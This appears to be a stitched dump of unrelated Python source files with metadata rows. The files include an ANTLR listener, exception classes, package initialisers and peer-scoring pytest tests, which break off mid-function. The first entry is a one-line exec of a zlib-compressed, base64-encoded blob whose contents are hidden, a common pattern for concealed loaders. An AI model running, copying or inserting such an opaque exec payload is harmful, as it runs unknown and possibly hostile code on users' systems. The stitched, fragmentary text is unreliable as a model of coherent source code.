exec(zlib.decompress(base64.b64decode("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")))
| 1,773 | 5,299 | 0.964467 | 176 | 5,319 | 29.147727 | 0.982955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15933 | 0.000564 | 5,319 | 2 | 5,300 | 2,659.5 | 0.805681 | 0 | 0 | 0 | 0 | 0.5 | 0.988156 | 0.988156 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
85a1bba6ca1ad44f61aee0988309298800b8e885 | 141 | py | Python | models/__init__.py | TsingZ0/variational_dropout | 4ba3b9d05d1d4a54fbf8c3fd8370a76e6046b54b | [
"MIT"
] | 50 | 2017-10-10T15:26:40.000Z | 2022-03-15T11:20:13.000Z | models/__init__.py | TsingZ0/variational_dropout | 4ba3b9d05d1d4a54fbf8c3fd8370a76e6046b54b | [
"MIT"
] | null | null | null | models/__init__.py | TsingZ0/variational_dropout | 4ba3b9d05d1d4a54fbf8c3fd8370a76e6046b54b | [
"MIT"
] | 7 | 2018-02-02T02:54:13.000Z | 2021-04-24T08:17:45.000Z | from .simple_model import SimpleModel
from .dropout_model import DropoutModel
from .variational_dropout_model import VariationalDropoutModel
| 35.25 | 62 | 0.893617 | 16 | 141 | 7.625 | 0.5625 | 0.270492 | 0.295082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 141 | 3 | 63 | 47 | 0.945736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a431d46f6754ed6912f30d9aaad0d6f1cd4fbd3c | 2,981 | py | Python | qrogue/game/world/dungeon_generator/world_parser/QrogueWorldListener.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | 4 | 2021-12-14T19:13:43.000Z | 2022-02-16T13:25:38.000Z | qrogue/game/world/dungeon_generator/world_parser/QrogueWorldListener.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | null | null | null | qrogue/game/world/dungeon_generator/world_parser/QrogueWorldListener.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | 1 | 2022-01-04T18:35:51.000Z | 2022-01-04T18:35:51.000Z | # Generated from D:/Documents/pycharm_workspace/Qrogue/qrogue/dungeon_editor\QrogueWorld.g4 by ANTLR 4.9.2
from antlr4 import *
# This class defines a complete listener for a parse tree produced by QrogueWorldParser.
class QrogueWorldListener(ParseTreeListener):
# Enter a parse tree produced by QrogueWorldParser#start.
def enterStart(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#start.
def exitStart(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#layout.
def enterLayout(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#layout.
def exitLayout(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#l_room_row.
def enterL_room_row(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#l_room_row.
def exitL_room_row(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#l_hallway_row.
def enterL_hallway_row(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#l_hallway_row.
def exitL_hallway_row(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#rooms.
def enterRooms(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#rooms.
def exitRooms(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#room.
def enterRoom(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#room.
def exitRoom(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#r_attributes.
def enterR_attributes(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#r_attributes.
def exitR_attributes(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#r_visibility.
def enterR_visibility(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#r_visibility.
def exitR_visibility(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#r_type.
def enterR_type(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#r_type.
def exitR_type(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#hallways.
def enterHallways(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#hallways.
def exitHallways(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#hallway.
def enterHallway(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#hallway.
def exitHallway(self, ctx):
pass
# Enter a parse tree produced by QrogueWorldParser#h_attributes.
def enterH_attributes(self, ctx):
pass
# Exit a parse tree produced by QrogueWorldParser#h_attributes.
def exitH_attributes(self, ctx):
pass
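# --- Usage sketch (an illustrative addition, not part of the generated file).
# Generated listeners are meant to be subclassed: override only the callbacks
# you need and let antlr4's ParseTreeWalker drive them over a parse tree.
class RoomCountingListener(QrogueWorldListener):
    """Hypothetical example: count rooms while walking a parsed world tree."""
    def __init__(self):
        self.room_count = 0

    def enterRoom(self, ctx):
        self.room_count += 1
# Walking a tree would then look like (parser/tree construction omitted):
#   ParseTreeWalker().walk(RoomCountingListener(), tree)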
| 25.921739 | 106 | 0.690708 | 380 | 2,981 | 5.328947 | 0.178947 | 0.074074 | 0.123457 | 0.222222 | 0.788148 | 0.777284 | 0.759012 | 0.756543 | 0.685926 | 0.639506 | 0 | 0.002228 | 0.247232 | 2,981 | 114 | 107 | 26.149123 | 0.900178 | 0.529688 | 0 | 0.48 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.48 | false | 0.48 | 0.02 | 0 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
8ef74b49c1359e9afa39cf7c335873167d27aeb5 | 200 | py | Python | py2df/constants/__init__.py | PgBiel/Py2DF | cbce77763e90b63e6824b4d3f506236fb9925a5c | [
"MIT"
] | 1 | 2021-06-02T00:07:28.000Z | 2021-06-02T00:07:28.000Z | py2df/constants/__init__.py | jmyrick02/Py2DF | cbce77763e90b63e6824b4d3f506236fb9925a5c | [
"MIT"
] | null | null | null | py2df/constants/__init__.py | jmyrick02/Py2DF | cbce77763e90b63e6824b4d3f506236fb9925a5c | [
"MIT"
] | null | null | null | """Constant values for the library, preventing the use of 'magic numbers' and whatnot."""
from .num_consts import *
from .str_consts import *
from .regex_consts import *
from .utility_consts import *
| 33.333333 | 89 | 0.765 | 29 | 200 | 5.137931 | 0.655172 | 0.322148 | 0.322148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145 | 200 | 5 | 90 | 40 | 0.871345 | 0.415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f135ad70b60c64d3b0fa7746efd34fcd1fea0888 | 919 | py | Python | backend/src/core/helpers/exceptions.py | uesleicarvalhoo/ProjectStore | 9b7518eab6b0c21bf7b908cdd9a1b063485c5943 | [
"MIT"
] | 1 | 2021-10-10T13:26:44.000Z | 2021-10-10T13:26:44.000Z | backend/src/core/helpers/exceptions.py | uesleicarvalhoo/Store | 9b7518eab6b0c21bf7b908cdd9a1b063485c5943 | [
"MIT"
] | null | null | null | backend/src/core/helpers/exceptions.py | uesleicarvalhoo/Store | 9b7518eab6b0c21bf7b908cdd9a1b063485c5943 | [
"MIT"
] | null | null | null | from typing import Any, Dict, Union
class DatabaseError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
class NotFoundError(Exception):
detail: str = None
def __init__(self, message: Union[Dict[str, Any], str]) -> None:
self.detail = message
super().__init__(message)
class InvalidCredentialError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
class NotAuthorizedError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
class DataValidationError(Exception):
detail: str = None
def __init__(self, message: str) -> None:
self.detail = message
super().__init__(message)
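# --- Usage sketch (an illustrative addition, not part of the original module).
# Every class above exposes its message through `detail`, so one generic
# handler can render any of them uniformly. Hypothetical example:
def example_error_payload() -> Dict[str, Any]:
    try:
        raise NotFoundError({"user_id": 42})
    except NotFoundError as err:
        return {"error": err.detail}  # -> {"error": {"user_id": 42}}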
| 21.880952 | 68 | 0.645267 | 100 | 919 | 5.53 | 0.21 | 0.126582 | 0.162749 | 0.198915 | 0.759494 | 0.759494 | 0.759494 | 0.759494 | 0.687161 | 0.605787 | 0 | 0 | 0.242655 | 919 | 41 | 69 | 22.414634 | 0.79454 | 0 | 0 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.038462 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
74b3a4d20b333b0b997b5728318a90404f721bc4 | 14,563 | py | Python | test/node/test_scoring_system.py | 0xProject/p2p_incentives | ce69926eb3d003fb2767651df9486556c0e20ab6 | [
"Apache-2.0"
] | 3 | 2020-03-11T19:42:48.000Z | 2021-04-01T21:09:05.000Z | test/node/test_scoring_system.py | 0xProject/p2p_incentives | ce69926eb3d003fb2767651df9486556c0e20ab6 | [
"Apache-2.0"
] | null | null | null | test/node/test_scoring_system.py | 0xProject/p2p_incentives | ce69926eb3d003fb2767651df9486556c0e20ab6 | [
"Apache-2.0"
] | null | null | null | """
This module tests the scoring system for neighbor contributions. Score changes happen in
receive_order_internal() and store_orders(), but it is difficult to cover all scoring cases
when the tests of those two functions focus on other aspects, so we dedicate individual
test functions to the score updates here.
"""
import pytest
from message import Order
from node import Peer
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_order,
create_a_test_peer,
)
def always_store_orders(peer):
"""
    This is a fake function for store_or_discard_orders(); it always stores orders.
"""
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
orderinfo.storage_decision = True
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_penalty_a(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for penalty_a
"""
# Setting for this case:
# Order does not pass should_accept_internal_order()
# Order rejected since it doesn't pass should_accept_internal_order() (penalty_a).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# clear score sheet for neighbors
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Order cannot be accepted to the pending list
def never_accept_internal_order(_receiver, _sender, _order):
return False
monkeypatch.setattr(
engine, "should_accept_internal_order", never_accept_internal_order
)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == -13
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_a(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_a
"""
# Setting for this case:
# my_peer's initial status:
# Local storage: there is an Order instance from the same neighbor
# Behavior: neighbor sends order to my_peer
# Result: Order rejected since there's a duplicate in local storage from the same neighbor (
# reward_a).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(neighbor, order)
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 2
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_b(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_b
"""
# Setting for this case:
# my_peer's initial status:
# Local storage: there is an Order instance from the competitor.
# Behavior: neighbor sends order to my_peer
    # Result: Order rejected since there's a duplicate in local storage from competitor (
# reward_b).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
competitor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
for anyone in (neighbor, competitor):
my_peer.add_neighbor(anyone)
anyone.add_neighbor(my_peer)
# let neighbor and competitor own the order that it should have
for anyone in (neighbor, competitor):
anyone.receive_order_external(order)
anyone.send_orders_to_on_chain_check(anyone.local_clock)
anyone.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(competitor, order)
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# Always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 3
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_penalty_b(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for penalty_b
"""
# Setting for this case:
# my_peer's initial status:
# Pending table: there is an Order instance from the same neighbor
# Behavior: neighbor sends order to my_peer
    # Result: The second copy is rejected since there's a duplicate in the pending table from the
    # same neighbor (penalty_b); the first copy, however, is eventually stored (reward_d)
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(neighbor, order)
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# Always store orders
monkeypatch.setattr(engine, "store_or_discard_orders", always_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == -10
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_c(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_c
"""
# Setting for this case:
# Order passes should_accept_internal_order() but storage_decision is False
# Order accepted to pending table, rejected to storage, and gets reward_c
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# let neighbor own the order that it should have
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# clear score sheet for neighbors
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# This fake function sets storage_decision as False for any orderinfo.
def never_store_orders(peer):
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
orderinfo.storage_decision = False
monkeypatch.setattr(engine, "store_or_discard_orders", never_store_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 5
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_d(scenario, engine, monkeypatch) -> None:
"""
This function tests the case for reward_d
"""
# Setting for this case:
# my_peer's initial status:
# Pending table: there is a pending orderinfo instance from the competitor.
# Behavior: neighbor sends order to my_peer
# Result: Order from neighbor stored since neighbor won over competitor (reward_d).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
competitor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
for anyone in (neighbor, competitor):
my_peer.add_neighbor(anyone)
anyone.add_neighbor(my_peer)
# let neighbor and competitor own the order that it should have
for anyone in (neighbor, competitor):
anyone.receive_order_external(order)
anyone.send_orders_to_on_chain_check(anyone.local_clock)
anyone.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(competitor, order)
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# This fake function sets storage_decision as True for orderinfo from neighbor and False
# from competitor.
